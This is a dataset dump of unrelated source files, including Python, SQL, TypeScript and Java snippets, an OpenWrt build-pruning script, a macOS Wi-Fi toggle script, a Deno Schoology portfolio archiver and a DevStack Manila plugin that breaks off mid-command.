text stringlengths 1 1.05M |
|---|
import TokamakTests
import XCTest
var tests = [XCTestCaseEntry]()
tests += TokamakTests.allTests()
XCTMain(tests) |
class Stack:
def __init__(self):
self.items = []
def isEmpty(self):
return self.items == []
def push(self, item):
self.items.append(item)
def pop(self):
return self.items.pop()
def peek(self):
return self.items[len(self.items)-1]
def size(self):
return len(self.items) |
<filename>INFO/Books Codes/Oracle Wait Interface A Practical Guide to Performance Diagnostics & Tuning/Chapter6_page177_1.sql
-- Oracle9i Database and above
select *
from v$enqueue_stat
where cum_wait_time > 0
order by inst_id, cum_wait_time;
-- Oracle 7.1.6 to 8.1.7
select inst_id,
ksqsttyp "Lock",
ksqstget "Gets",
ksqstwat "Waits"
from x$ksqst
where ksqstwat > 0
order by inst_id, ksqstwat;
|
<reponame>joewood/refluxion
import Sequelize = require("sequelize");
var graphqlSeq = require("graphql-sequelize");
let {typeMapper, resolver, attributeFields, defaultListArgs, defaultArgs} = graphqlSeq;
import * as GraphQL from "graphql";
function fromISODate(value) {
try {
if (!value) return null;
return new Date(value);
}
catch (e) {
console.error("Error converting date", e);
return null;
}
}
function toISODate(d: Date): any {
if (!d) return null;
if ((d instanceof Date)) {
return d.toISOString();
}
return new Date(d as any).toISOString();
}
export const GraphQLDate = new GraphQL.GraphQLScalarType({
name: "Date",
description: "A special custom Scalar type for Dates that converts to a ISO formatted string ",
serialize: toISODate,
parseValue: fromISODate,
parseLiteral: (ast:any) => {
return new Date(ast.value);
}
});
|
<gh_stars>1-10
package com.ensoftcorp.open.dynadoc.core.wrapper;
import java.util.List;
import com.ensoftcorp.open.dynadoc.core.data.Issue;
import com.ensoftcorp.open.dynadoc.core.data.JavaClass;
import com.hp.gagawa.java.elements.A;
import com.hp.gagawa.java.elements.Div;
import com.hp.gagawa.java.elements.Table;
import com.hp.gagawa.java.elements.Tbody;
import com.hp.gagawa.java.elements.Td;
import com.hp.gagawa.java.elements.Tfoot;
import com.hp.gagawa.java.elements.Th;
import com.hp.gagawa.java.elements.Thead;
import com.hp.gagawa.java.elements.Tr;
public class ClassIssuesWrapper {
private static final String ISSUES_TABLE_JAVASCRIPT_FILE_NAME = "jquery-issues-table-script.js";
private static final String ISSUES_SECTION_HEADER = "Issue Summary";
private static final String ISSUES_TABLE_NAME = "issues-table";
private static final String [] ISSUES_TABLE_HEADERS = { "Issue Id", "Last Changed", "Summary", "Status", "Severity", "Priority", "Related Commits", "View Report" };
private List<Issue> issues;
public ClassIssuesWrapper(JavaClass javaClass) {
this.issues = javaClass.getIssues();
}
private List<Issue> getIssues() {
return this.issues;
}
public Div wrap() {
Div fieldsTableDiv = new Div();
fieldsTableDiv.setCSSClass("card text-white bg-secondary mb-3");
fieldsTableDiv.setStyle("max-width: 98%; margin: 10pt");
Div cardHeader = new Div();
cardHeader.setCSSClass("card-header");
cardHeader.appendText(ISSUES_SECTION_HEADER);
Div cardContent = new Div();
cardContent.setCSSClass("card-body bg-white text-dark");
Table table = new Table();
table.setId(ISSUES_TABLE_NAME);
table.setCSSClass("display small");
table.setStyle("width:100%");
Thead tHead = new Thead();
Tr tr = new Tr();
Th firstColumn = new Th();
tr.appendChild(firstColumn);
for(String headerText: ISSUES_TABLE_HEADERS) {
Th column = new Th();
column.appendText(headerText);
tr.appendChild(column);
}
tHead.appendChild(tr);
table.appendChild(tHead);
Tbody tBody = new Tbody();
List<Issue> issues = this.getIssues();
for(Issue issue: issues) {
Tr issueRow = this.wrapIssue(issue);
tBody.appendChild(issueRow);
}
table.appendChild(tBody);
Tfoot tFoot = new Tfoot();
tr = new Tr();
firstColumn = new Th();
tr.appendChild(firstColumn);
for(int i = 0; i < ISSUES_TABLE_HEADERS.length; i++) {
Th column = new Th();
tr.appendChild(column);
}
tFoot.appendChild(tr);
table.appendChild(tFoot);
cardContent.appendChild(table);
cardHeader.appendChild(cardContent);
fieldsTableDiv.appendChild(cardHeader);
return fieldsTableDiv;
}
private Tr wrapIssue(Issue issue) {
Tr row = new Tr();
Td showHideColumn = this.wrapShowHideIcon();
row.appendChild(showHideColumn);
Td idColumn = this.wrapId(issue);
row.appendChild(idColumn);
Td lastChanged = this.wrapLastChanged(issue);
row.appendChild(lastChanged);
Td summaryColumn = this.wrapSummary(issue);
row.appendChild(summaryColumn);
Td statusColumn = this.wrapStatus(issue);
row.appendChild(statusColumn);
Td severityColumn = this.wrapSeverity(issue);
row.appendChild(severityColumn);
Td priorityColumn = this.wrapPriority(issue);
row.appendChild(priorityColumn);
Td commitsColumn = this.wrapCommits(issue);
row.appendChild(commitsColumn);
Td urlColumn = this.wrapUrl(issue);
row.appendChild(urlColumn);
return row;
}
private Td wrapShowHideIcon() {
Td td = new Td();
td.setCSSClass("details-control");
return td;
}
private Td wrapId(Issue issue) {
Td td = new Td();
td.appendText(issue.id());
return td;
}
private Td wrapLastChanged(Issue issue) {
Td td = new Td();
td.appendText(issue.lastChanged());
return td;
}
private Td wrapSummary(Issue issue) {
Td td = new Td();
td.appendText(issue.summary());
return td;
}
private Td wrapStatus(Issue issue) {
Td td = new Td();
td.appendText(issue.status());
return td;
}
private Td wrapSeverity(Issue issue) {
Td td = new Td();
td.appendText(issue.severity());
return td;
}
private Td wrapPriority(Issue issue) {
Td td = new Td();
td.appendText(issue.priority());
return td;
}
private Td wrapCommits(Issue issue) {
Td td = new Td();
td.appendText(issue.associatedCommitsString());
return td;
}
private Td wrapUrl(Issue issue) {
Td td = new Td();
A link = new A();
link.setHref(issue.url());
link.setTarget("_blank");
link.setAttribute("role", "button");
link.setAttribute("class", "btn btn-primary");
link.appendText("Show");
td.appendChild(link);
return td;
}
}
|
#!/bin/bash
shopt -s extglob
rm -rf feeds/jell/{diy,mt-drivers,shortcut-fe,luci-app-mtwifi,base-files}
for ipk in $(find feeds/jell/* -maxdepth 0 -type d);
do
[[ "$(grep "KernelPackage" "$ipk/Makefile")" && ! "$(grep "BuildPackage" "$ipk/Makefile")" ]] && rm -rf $ipk || true
done
rm -rf package/{base-files,network/config/firewall,network/services/dnsmasq,network/services/ppp,system/opkg,libs/mbedtls}
rm -Rf feeds/luci/{applications,collections,protocols,themes,libs,docs,contrib}
rm -Rf feeds/luci/modules/!(luci-base)
# rm -rf feeds/packages/libs/!(libev|c-ares|cjson|boost|lib*|expat|tiff|freetype|udns|pcre2)
rm -Rf feeds/packages/!(lang|libs|devel|utils|net|multimedia)
rm -Rf feeds/packages/multimedia/!(gstreamer1)
rm -Rf feeds/packages/utils/!(pcsc-lite|xz)
rm -Rf feeds/packages/net/!(mosquitto|curl)
rm -Rf feeds/base/package/{kernel,firmware}
rm -Rf feeds/base/package/network/!(services|utils)
rm -Rf feeds/base/package/network/services/!(ppp)
rm -Rf feeds/base/package/network/utils/!(iwinfo|iptables)
rm -Rf feeds/base/package/utils/!(util-linux|lua)
rm -Rf feeds/base/package/system/!(opkg|ubus|uci|ca-certificates)
./scripts/feeds update -a
./scripts/feeds install -a -p jell
./scripts/feeds install -a
sed -i 's/\(page\|e\)\?.acl_depends.*\?}//' `find package/feeds/jell/luci-*/luasrc/controller/* -name "*.lua"`
sed -i 's/\/cgi-bin\/\(luci\|cgi-\)/\/\1/g' `find package/feeds/jell/luci-*/ -name "*.lua" -or -name "*.htm*" -or -name "*.js"` &
sed -i 's/Os/O2/g' include/target.mk
#rm -rf ./feeds/packages/lang/golang
#svn co https://github.com/immortalwrt/packages/trunk/lang/golang feeds/packages/lang/golang
sed -i '/root:/c\root:$1$tTPCBw1t$ldzfp37h5lSpO9VXk4uUE\/:18336:0:99999:7:::' package/feeds/jell/base-files/files/etc/shadow
sed -i "s/tty1::askfirst/tty1::respawn/g" target/linux/*/base-files/etc/inittab
sed -i \
-e "s/+\(luci\|luci-ssl\|uhttpd\)\( \|$\)/\2/" \
-e "s/+nginx\( \|$\)/+nginx-ssl\1/" \
-e 's/+python\( \|$\)/+python3/' \
-e 's?../../lang?$(TOPDIR)/feeds/packages/lang?' \
-e 's,$(STAGING_DIR_HOST)/bin/upx,upx,' \
package/feeds/jell/*/Makefile
date=`date +%m.%d.%Y`
sed -i -e "/\(# \)\?REVISION:=/c\REVISION:=$date" -e '/VERSION_CODE:=/c\VERSION_CODE:=$(REVISION)' include/version.mk
cp -f devices/common/.config .config
mv feeds/base feeds/base.bak
mv feeds/packages feeds/packages.bak
make defconfig
rm -Rf tmp
mv feeds/base.bak feeds/base
mv feeds/packages.bak feeds/packages
sed -i 's/CONFIG_ALL=y/CONFIG_ALL=n/' .config
sed -i '/PACKAGE_kmod-/d' .config
sed -i "/mediaurlbase/d" package/feeds/*/luci-theme*/root/etc/uci-defaults/*
sed -i '/WARNING: Makefile/d' scripts/package-metadata.pl
if [ -f /usr/bin/python ]; then
ln -sf /usr/bin/python staging_dir/host/bin/python
else
ln -sf /usr/bin/python3 staging_dir/host/bin/python
fi
ln -sf /usr/bin/python3 staging_dir/host/bin/python3
cp -f devices/common/po2lmo staging_dir/host/bin/po2lmo
chmod +x staging_dir/host/bin/po2lmo
|
#!/bin/sh
#Detect WiFi port number (en0 or en1)
wifi=`/usr/sbin/networksetup -listallhardwareports | awk '/Hardware Port: Wi-Fi/,/Ethernet/' | awk 'NR==2' | cut -d " " -f 2`
ethernet=`/usr/sbin/networksetup -listallhardwareports | awk '/Hardware Port: Ethernet/,/Wi-Fi/' | awk 'NR==2' | cut -d " " -f 2`
EthStatus=`/sbin/ifconfig $ethernet | grep "status" | awk '{print $2}'`
#Check If WiFi is primary connection#
if [ "$wifi" == "en0" ]; then
echo "Wi-Fi is primary connection, exiting"
exit 0
else
#Check If Ethernet active#
if [ "$EthStatus" == "active" ]; then
echo "Ethernet active, disabling Wi-Fi"
#Turn off WiFi
ifconfig $wifi down
sleep 2
#De-Activate Wifi
networksetup -setnetworkserviceenabled Wi-Fi off
else
echo "Ethernet inactive, enabling Wi-Fi"
#Activate Wifi
networksetup -setnetworkserviceenabled Wi-Fi on
sleep 5
#Turn on WiFi
ifconfig $wifi up
fi
fi |
// deno-lint-ignore-file camelcase
import { ensureDir } from 'https://deno.land/std@0.97.0/fs/ensure_dir.ts'
import { exists } from 'https://deno.land/std@0.103.0/fs/exists.ts'
import {
AnticipatedHttpError,
cachePath,
external,
getFilePath,
} from './cache.ts'
import * as html from './html-maker.ts'
import { me } from './me.ts'
import { stringToPath } from './utilts.ts'
type ApiPortfoliosInitResponse = {
data: {
csrfToken: string
hints: string[]
// eg https://asset-cdn.schoology.com/portfolios/assets/portfolio-078b8c30726f3f32d6d6.js
script: string
}
}
type FileInfo = {
id: number
fileId: number | null
type: number
tempURI: string
publicURI: string | null
filename: string
filemime: string
md5Checksum: string
conversionFailed: boolean
conversionPending: boolean
pdfConversion: null
swfConversion: null
image_presets?: {
profile_reg: string
profile_sm: string
profile_tiny: string
profile_big: string
album_thumbnail: string
album_large: string
album_source: string
}
}
type ApiPortfolioThingBase = {
id: number
created_at: string
updated_at: string
file_info: FileInfo | null
cropped_file_info: FileInfo | null
}
interface ApiPortfolioOrItem extends ApiPortfolioThingBase {
title: string
description: string
file_id: number | null
color_code: null
use_file_id: 0 | 1
position: string // eg "-g" or "g" or "i" or "-h" ??
cropped_file_id: number | null
crop_info: {
xoffset: number
yoffset: number
width: number
height: number
} | null
}
interface ApiPortfolio extends ApiPortfolioOrItem {
public_hash: string
user_id: number
published: boolean
editable: boolean
public_share_url: string
item_count: number
}
type ApiUserPortfoliosResponse = {
data: {
canExport: boolean
editable: boolean
/** A datetime in the form of `2021-07-29 00:18:26 -0700` */
updated_at: string
portfolios: ApiPortfolio[]
}
}
interface ApiItemThing extends ApiPortfolioOrItem {
portfolio_id: number
deck_id: null
previous_id: number | null
next_id: number | null
}
type ApiItemType =
| {
item_type: 'page'
metadata: ApiPortfolioThingBase & {
portfolio_item_id: number
content: string
}
}
| {
item_type: 'link'
metadata: ApiPortfolioThingBase & {
portfolio_item_id: number
url: string
x_frame_options: string // can be empty
absolute_url: string
url_type: 'iframe'
}
}
| {
item_type: 'assignment'
metadata: ApiPortfolioThingBase & {
portfolio_item_id: number
file_id: number
submission_id: number
revision_id: number // or is this 0 | 1?
grade_item_id: number
}
}
| {
item_type: 'file'
metadata: ApiPortfolioThingBase & {
portfolio_item_id: number
file_id: number
}
}
type ApiItem = ApiItemThing & ApiItemType
type ApiPortfolioResponse = {
data: ApiPortfolio & {
previous_id: number | null
next_id: number | null
items: ApiItem[]
}
}
/** Get portfolios for a user ID */
export async function archivePortfolios (
userId: number,
path = `./output/users/${userId}/`,
): Promise<void> {
const {
data: { csrfToken },
}: ApiPortfoliosInitResponse = await cachePath('/portfolios/init')
const portfolios: ApiUserPortfoliosResponse | null = await cachePath(
`/portfolios/users/${userId}/portfolios`,
'json',
{ headers: { 'X-Csrf-Token': csrfToken }, allow404: true },
).catch(err =>
err instanceof AnticipatedHttpError ? null : Promise.reject(err),
)
if (!portfolios) return
for (const { id, title, description } of portfolios.data.portfolios) {
const outPath = `${path}portfolios/${id}_${stringToPath(title)}/`
const { data: portfolio }: ApiPortfolioResponse = await cachePath(
`/portfolios/users/${userId}/portfolios/${id}`,
'json',
{ headers: { 'X-Csrf-Token': csrfToken } },
)
await ensureDir(outPath)
let needDownload = false
outer: for (const item of portfolio.items) {
for (const fileInfo of [item.file_info, item.metadata.file_info]) {
if (fileInfo) {
const path = `${outPath}${item.id}_${stringToPath(
fileInfo.filename.slice(0, fileInfo.filename.lastIndexOf('.')),
)}${fileInfo.filename.slice(fileInfo.filename.lastIndexOf('.'))}`
if (!(await exists(path))) {
needDownload = true
break outer
}
}
}
}
if (needDownload) {
// Try to get new, unstale download links by clearing the cache and
// re-fetching it
const reqPath = `/portfolios/users/${userId}/portfolios/${id}`
const oldCachePath = getFilePath(reqPath, 'json')
await Deno.remove(oldCachePath)
const { data: portfolio }: ApiPortfolioResponse = await cachePath(
`/portfolios/users/${userId}/portfolios/${id}`,
'json',
{ headers: { 'X-Csrf-Token': csrfToken }, retryOn404Or500: true },
)
for (const item of portfolio.items) {
for (const fileInfo of [item.file_info, item.metadata.file_info]) {
if (fileInfo) {
const path = `${outPath}${item.id}_${stringToPath(
fileInfo.filename.slice(0, fileInfo.filename.lastIndexOf('.')),
)}${fileInfo.filename.slice(fileInfo.filename.lastIndexOf('.'))}`
await cachePath(external(fileInfo.tempURI), 'file', {
cachePath: path,
})
}
}
}
}
await Deno.writeTextFile(
outPath + 'index.html',
html.page(
html.style(
html.raw(
[
'table {',
'border-collapse: collapse;',
'}',
'th,',
'td {',
'border: 1px solid currentColor;',
'}',
].join(''),
),
),
// html.base({ href: root }),
html.h1(title),
html.p(description),
html.p(
html.em(
`Created ${portfolio.created_at}`,
portfolio.created_at !== portfolio.updated_at &&
`, edited ${portfolio.updated_at}`,
),
),
html.table(
html.tr(html.th('Name and description'), html.th('Content')),
portfolio.items.map(item => {
const fileInfo = item.file_info || item.metadata.file_info
let fileInfoHtml = null
if (fileInfo) {
const path = `./${item.id}_${stringToPath(
fileInfo.filename.slice(0, fileInfo.filename.lastIndexOf('.')),
)}${fileInfo.filename.slice(fileInfo.filename.lastIndexOf('.'))}`
fileInfoHtml = [
html.a({ href: path }, fileInfo.filename),
'\n',
fileInfo.filemime.startsWith('image/')
? html.img({ src: path, style: { 'max-width': '60vw' } })
: fileInfo.filemime.startsWith('audio/')
? html.audio({ src: path, controls: true })
: fileInfo.filemime === 'application/pdf'
? html.iframe({
src: path,
style: { width: '60vw', height: '40vw' },
})
: null,
]
}
return html.tr(
html.td(
html.strong(item.title),
'\n',
item.description,
'\n',
html.em(
`Created ${item.created_at}`,
item.created_at !== item.updated_at &&
`, edited ${item.updated_at}`,
),
),
html.td(
item.item_type === 'page'
? html.raw(item.metadata.content)
: item.item_type === 'link'
? html.a(
{ href: item.metadata.absolute_url },
html.strong('Link'),
)
: null,
fileInfoHtml,
),
)
}),
),
),
)
}
}
if (import.meta.main) {
await archivePortfolios(me.id, './output/users/2017219_Sean_Yen/')
}
|
#!/bin/bash
# Plugin file for enabling manila services
# ----------------------------------------
# Save trace setting
XTRACE=$(set +o | grep xtrace)
set -o xtrace
# Entry Points
# ------------
function _clean_share_group {
local vg=$1
local vg_prefix=$2
# Clean out existing shares
for lv in `sudo lvs --noheadings -o lv_name $vg`; do
# vg_prefix prefixes the LVs we want
if [[ "${lv#$vg_prefix}" != "$lv" ]]; then
sudo umount -f $MANILA_MNT_DIR/$lv
sudo lvremove -f $vg/$lv
sudo rm -rf $MANILA_MNT_DIR/$lv
fi
done
}
function _clean_manila_lvm_backing_file {
local vg=$1
# if there is no logical volume left, it's safe to attempt a cleanup
# of the backing file
if [ -z "`sudo lvs --noheadings -o lv_name $vg`" ]; then
# if the backing physical device is a loop device, it was probably setup by devstack
VG_DEV=$(sudo losetup -j $DATA_DIR/${vg}-backing-file | awk -F':' '/backing-file/ { print $1
}')
if [[ -n "$VG_DEV" ]]; then
sudo losetup -d $VG_DEV
rm -f $DATA_DIR/${vg}-backing-file
fi
fi
}
function _clean_zfsonlinux_data {
for filename in "$MANILA_ZFSONLINUX_BACKEND_FILES_CONTAINER_DIR"/*; do
if [[ $(sudo zpool list | grep $filename) ]]; then
echo "Destroying zpool named $filename"
sudo zpool destroy -f $filename
file="$MANILA_ZFSONLINUX_BACKEND_FILES_CONTAINER_DIR$filename"
echo "Destroying file named $file"
rm -f $file
fi
done
}
# cleanup_manila - Remove residual data files, anything left over from previous
# runs that a clean run would need to clean up
function cleanup_manila {
# All stuff, that are created by share drivers will be cleaned up by other services.
_clean_share_group $SHARE_GROUP $SHARE_NAME_PREFIX
_clean_manila_lvm_backing_file $SHARE_GROUP
_clean_zfsonlinux_data
if [ $(trueorfalse False MANILA_USE_UWSGI) == True ]; then
remove_uwsgi_config "$MANILA_UWSGI_CONF" "$MANILA_WSGI"
fi
}
# _config_manila_apache_wsgi() - Configure manila-api wsgi application.
function _config_manila_apache_wsgi {
local manila_api_apache_conf
local venv_path=""
manila_api_apache_conf=$(apache_site_config_for manila-api)
sudo cp $MANILA_DIR/devstack/apache-manila.template $manila_api_apache_conf
sudo sed -e "
s|%APACHE_NAME%|$APACHE_NAME|g;
s|%MANILA_BIN_DIR%|$MANILA_BIN_DIR|g;
s|%PORT%|$REAL_MANILA_SERVICE_PORT|g;
s|%APIWORKERS%|$API_WORKERS|g;
s|%USER%|$STACK_USER|g;
" -i $manila_api_apache_conf
}
# configure_default_backends - configures default Manila backends with generic driver.
function configure_default_backends {
# Configure two default backends with generic drivers onboard
for group_name in $MANILA_BACKEND1_CONFIG_GROUP_NAME $MANILA_BACKEND2_CONFIG_GROUP_NAME; do
iniset $MANILA_CONF $group_name share_driver $SHARE_DRIVER
if [ "$MANILA_BACKEND1_CONFIG_GROUP_NAME" == "$group_name" ]; then
iniset $MANILA_CONF $group_name share_backend_name $MANILA_SHARE_BACKEND1_NAME
else
iniset $MANILA_CONF $group_name share_backend_name $MANILA_SHARE_BACKEND2_NAME
fi
iniset $MANILA_CONF $group_name path_to_public_key $MANILA_PATH_TO_PUBLIC_KEY
iniset $MANILA_CONF $group_name path_to_private_key $MANILA_PATH_TO_PRIVATE_KEY
iniset $MANILA_CONF $group_name service_image_name $MANILA_SERVICE_IMAGE_NAME
iniset $MANILA_CONF $group_name service_instance_user $MANILA_SERVICE_INSTANCE_USER
iniset $MANILA_CONF $group_name driver_handles_share_servers True
if [ "$SHARE_DRIVER" == $MANILA_CONTAINER_DRIVER ]; then
iniset $MANILA_CONF $group_name network_api_class $MANILA_NETWORK_API_CLASS
iniset $MANILA_CONF $group_name neutron_host_id $(hostname)
iniset $MANILA_CONF $group_name neutron_vnic_type $MANILA_NEUTRON_VNIC_TYPE
fi
if [ $(trueorfalse False MANILA_USE_SERVICE_INSTANCE_PASSWORD) == True ]; then
iniset $MANILA_CONF $group_name service_instance_password $MANILA_SERVICE_INSTANCE_PASSWORD
fi
if [ "$SHARE_DRIVER" == "manila.share.drivers.generic.GenericShareDriver" ]; then
iniset $MANILA_CONF $group_name ssh_conn_timeout $MANILA_SSH_TIMEOUT
fi
done
}
# set_config_opts - this allows to set any config opt to any config group,
# parsing env vars by prefix special 'MANILA_OPTGROUP_'.
function set_config_opts {
# expects only one param - name of config group(s) as list separated by commas
GROUP_NAMES=$1
if [[ -n "$GROUP_NAMES" ]]; then
for be in ${GROUP_NAMES//,/ }; do
# get backend_specific opt values
prefix=MANILA_OPTGROUP_$be\_
( set -o posix ; set ) | grep ^$prefix | while read -r line ; do
# parse it to opt names and values
opt=${line#$prefix}
opt_name=${opt%%=*}
opt_value=${opt##*=}
iniset $MANILA_CONF $be $opt_name $opt_value
done
done
fi
}
# set_cinder_quotas - Sets Cinder quotas, that is useful for generic driver,
# which uses Cinder volumes and snapshots.
function set_cinder_quotas {
# Update Cinder configuration to make sure default quotas are enough
# for Manila using Generic driver with parallel testing.
if is_service_enabled cinder; then
if [[ ! "$CINDER_CONF" ]]; then
CINDER_CONF=/etc/cinder/cinder.conf
fi
iniset $CINDER_CONF DEFAULT quota_volumes 50
iniset $CINDER_CONF DEFAULT quota_snapshots 50
iniset $CINDER_CONF DEFAULT quota_gigabytes 1000
fi
}
function set_backend_availability_zones {
ENABLED_BACKENDS=$1
echo_summary "Setting up backend_availability_zone option \
for any enabled backends that do not use the Generic driver. \
Availability zones for the Generic driver must coincide with those \
created for Nova and Cinder."
local zonenum
generic_driver='manila.share.drivers.generic.GenericShareDriver'
for BE in ${ENABLED_BACKENDS//,/ }; do
share_driver=$(iniget $MANILA_CONF $BE share_driver)
if [[ $share_driver != $generic_driver ]]; then
zone="manila-zone-$((zonenum++))"
iniset $MANILA_CONF $BE backend_availability_zone $zone
fi
done
}
# configure_manila - Set config files, create data dirs, etc
function configure_manila {
if [[ ! -d $MANILA_CONF_DIR ]]; then
sudo mkdir -p $MANILA_CONF_DIR
fi
sudo chown $STACK_USER $MANILA_CONF_DIR
if [[ -f $MANILA_DIR/etc/manila/policy.json ]]; then
cp -p $MANILA_DIR/etc/manila/policy.json $MANILA_CONF_DIR
fi
# Set the paths of certain binaries
MANILA_ROOTWRAP=$(get_rootwrap_location manila)
# If Manila ships the new rootwrap filters files, deploy them
# (owned by root) and add a parameter to $MANILA_ROOTWRAP
ROOTWRAP_MANILA_SUDOER_CMD="$MANILA_ROOTWRAP"
if [[ -d $MANILA_DIR/etc/manila/rootwrap.d ]]; then
# Wipe any existing rootwrap.d files first
if [[ -d $MANILA_CONF_DIR/rootwrap.d ]]; then
sudo rm -rf $MANILA_CONF_DIR/rootwrap.d
fi
# Deploy filters to /etc/manila/rootwrap.d
sudo mkdir -m 755 $MANILA_CONF_DIR/rootwrap.d
sudo cp $MANILA_DIR/etc/manila/rootwrap.d/*.filters $MANILA_CONF_DIR/rootwrap.d
sudo chown -R root:root $MANILA_CONF_DIR/rootwrap.d
sudo chmod 644 $MANILA_CONF_DIR/rootwrap.d/*
# Set up rootwrap.conf, pointing to /etc/manila/rootwrap.d
sudo cp $MANILA_DIR/etc/manila/rootwrap.conf $MANILA_CONF_DIR/
sudo sed -e "s:^filters_path=.*$:filters_path=$MANILA_CONF_DIR/rootwrap.d:" -i $MANILA_CONF_DIR/rootwrap.conf
sudo chown root:root $MANILA_CONF_DIR/rootwrap.conf
sudo chmod 0644 $MANILA_CONF_DIR/rootwrap.conf
# Specify rootwrap.conf as first parameter to manila-rootwrap
MANILA_ROOTWRAP="$MANILA_ROOTWRAP $MANILA_CONF_DIR/rootwrap.conf"
ROOTWRAP_MANILA_SUDOER_CMD="$MANILA_ROOTWRAP *"
fi
TEMPFILE=`mktemp`
echo "$USER ALL=(root) NOPASSWD: $ROOTWRAP_MANILA_SUDOER_CMD" >$TEMPFILE
chmod 0440 $TEMPFILE
sudo chown root:root $TEMPFILE
sudo mv $TEMPFILE /etc/sudoers.d/manila-rootwrap
cp $MANILA_DIR/etc/manila/api-paste.ini $MANILA_API_PASTE_INI
# Remove old conf file if exists
rm -f $MANILA_CONF
configure_keystone_authtoken_middleware $MANILA_CONF manila
iniset $MANILA_CONF DEFAULT auth_strategy keystone
iniset $MANILA_CONF DEFAULT debug True
iniset $MANILA_CONF DEFAULT scheduler_driver $MANILA_SCHEDULER_DRIVER
iniset $MANILA_CONF DEFAULT share_name_template ${SHARE_NAME_PREFIX}%s
iniset $MANILA_CONF DATABASE connection `database_connection_url manila`
iniset $MANILA_CONF DATABASE max_pool_size 40
iniset $MANILA_CONF DEFAULT api_paste_config $MANILA_API_PASTE_INI
iniset $MANILA_CONF DEFAULT rootwrap_config $MANILA_CONF_DIR/rootwrap.conf
iniset $MANILA_CONF DEFAULT osapi_share_extension manila.api.contrib.standard_extensions
iniset $MANILA_CONF DEFAULT state_path $MANILA_STATE_PATH
# Note: Sample share types will still be created if the below is False
if [ $(trueorfalse False MANILA_CONFIGURE_DEFAULT_TYPES) == True ]; then
iniset $MANILA_CONF DEFAULT default_share_type $MANILA_DEFAULT_SHARE_TYPE
iniset $MANILA_CONF DEFAULT default_share_group_type $MANILA_DEFAULT_SHARE_GROUP_TYPE
fi
if ! [[ -z $MANILA_SHARE_MIGRATION_PERIOD_TASK_INTERVAL ]]; then
iniset $MANILA_CONF DEFAULT migration_driver_continue_update_interval $MANILA_SHARE_MIGRATION_PERIOD_TASK_INTERVAL
fi
if ! [[ -z $MANILA_DATA_COPY_CHECK_HASH ]]; then
iniset $MANILA_CONF DEFAULT check_hash $MANILA_DATA_COPY_CHECK_HASH
fi
iniset $MANILA_CONF DEFAULT enabled_share_protocols $MANILA_ENABLED_SHARE_PROTOCOLS
iniset $MANILA_CONF oslo_concurrency lock_path $MANILA_LOCK_PATH
iniset $MANILA_CONF DEFAULT wsgi_keep_alive False
iniset $MANILA_CONF DEFAULT lvm_share_volume_group $SHARE_GROUP
# Set the replica_state_update_interval
iniset $MANILA_CONF DEFAULT replica_state_update_interval $MANILA_REPLICA_STATE_UPDATE_INTERVAL
# Set the use_scheduler_creating_share_from_snapshot
iniset $MANILA_CONF DEFAULT use_scheduler_creating_share_from_snapshot $MANILA_USE_SCHEDULER_CREATING_SHARE_FROM_SNAPSHOT
if is_service_enabled neutron; then
configure_keystone_authtoken_middleware $MANILA_CONF neutron neutron
fi
if is_service_enabled nova; then
configure_keystone_authtoken_middleware $MANILA_CONF nova nova
fi
if is_service_enabled cinder; then
configure_keystone_authtoken_middleware $MANILA_CONF cinder cinder
fi
# Note: set up config group does not mean that this backend will be enabled.
# To enable it, specify its name explicitly using "enabled_share_backends" opt.
configure_default_backends
default_backends=$MANILA_BACKEND1_CONFIG_GROUP_NAME
if [ "$MANILA_MULTI_BACKEND" = "True" ]; then
default_backends+=,$MANILA_BACKEND2_CONFIG_GROUP_NAME
fi
if [ ! $MANILA_ENABLED_BACKENDS ]; then
# If $MANILA_ENABLED_BACKENDS is not set, use configured backends by default
export MANILA_ENABLED_BACKENDS=$default_backends
fi
iniset $MANILA_CONF DEFAULT enabled_share_backends $MANILA_ENABLED_BACKENDS
if [ ! -f $MANILA_PATH_TO_PRIVATE_KEY ]; then
ssh-keygen -N "" -t rsa -f $MANILA_PATH_TO_PRIVATE_KEY;
fi
iniset $MANILA_CONF DEFAULT manila_service_keypair_name $MANILA_SERVICE_KEYPAIR_NAME
REAL_MANILA_SERVICE_PORT=$MANILA_SERVICE_PORT
if is_service_enabled tls-proxy; then
# Set the protocol to 'https', update the endpoint base and set the default port
MANILA_SERVICE_PROTOCOL="https"
MANILA_ENDPOINT_BASE="${MANILA_ENDPOINT_BASE/http:/https:}"
REAL_MANILA_SERVICE_PORT=$MANILA_SERVICE_PORT_INT
# Set the service port for a proxy to take the original
iniset $MANILA_CONF DEFAULT osapi_share_listen_port $REAL_MANILA_SERVICE_PORT
iniset $MANILA_CONF oslo_middleware enable_proxy_headers_parsing True
fi
iniset_rpc_backend manila $MANILA_CONF DEFAULT
setup_logging $MANILA_CONF
MANILA_CONFIGURE_GROUPS=${MANILA_CONFIGURE_GROUPS:-"$MANILA_ENABLED_BACKENDS"}
set_config_opts $MANILA_CONFIGURE_GROUPS
set_config_opts DEFAULT
set_backend_availability_zones $MANILA_ENABLED_BACKENDS
if [ $(trueorfalse False MANILA_USE_UWSGI) == True ]; then
write_uwsgi_config "$MANILA_UWSGI_CONF" "$MANILA_WSGI" "/share"
fi
if [ $(trueorfalse False MANILA_USE_MOD_WSGI) == True ]; then
_config_manila_apache_wsgi
fi
}
function create_manila_service_keypair {
if is_service_enabled nova; then
local keypair_exists=$( openstack keypair list | grep " $MANILA_SERVICE_KEYPAIR_NAME " )
if [[ -z $keypair_exists ]]; then
openstack keypair create $MANILA_SERVICE_KEYPAIR_NAME --public-key $MANILA_PATH_TO_PUBLIC_KEY
fi
fi
}
function is_driver_enabled {
driver_name=$1
for BE in ${MANILA_ENABLED_BACKENDS//,/ }; do
share_driver=$(iniget $MANILA_CONF $BE share_driver)
if [ "$share_driver" == "$driver_name" ]; then
return 0
fi
done
return 1
}
# create_service_share_servers - creates service Nova VMs, one per generic
# driver, and only if it is configured to mode without handling of share servers.
function create_service_share_servers {
created_admin_network=false
for BE in ${MANILA_ENABLED_BACKENDS//,/ }; do
driver_handles_share_servers=$(iniget $MANILA_CONF $BE driver_handles_share_servers)
share_driver=$(iniget $MANILA_CONF $BE share_driver)
generic_driver='manila.share.drivers.generic.GenericShareDriver'
if [[ $share_driver == $generic_driver ]]; then
if [[ $(trueorfalse False driver_handles_share_servers) == False ]]; then
vm_name='manila_service_share_server_'$BE
local vm_exists=$( openstack server list --all-projects | grep " $vm_name " )
if [[ -z $vm_exists ]]; then
private_net_id=$(openstack network show $PRIVATE_NETWORK_NAME -f value -c id)
vm_id=$(openstack server create $vm_name \
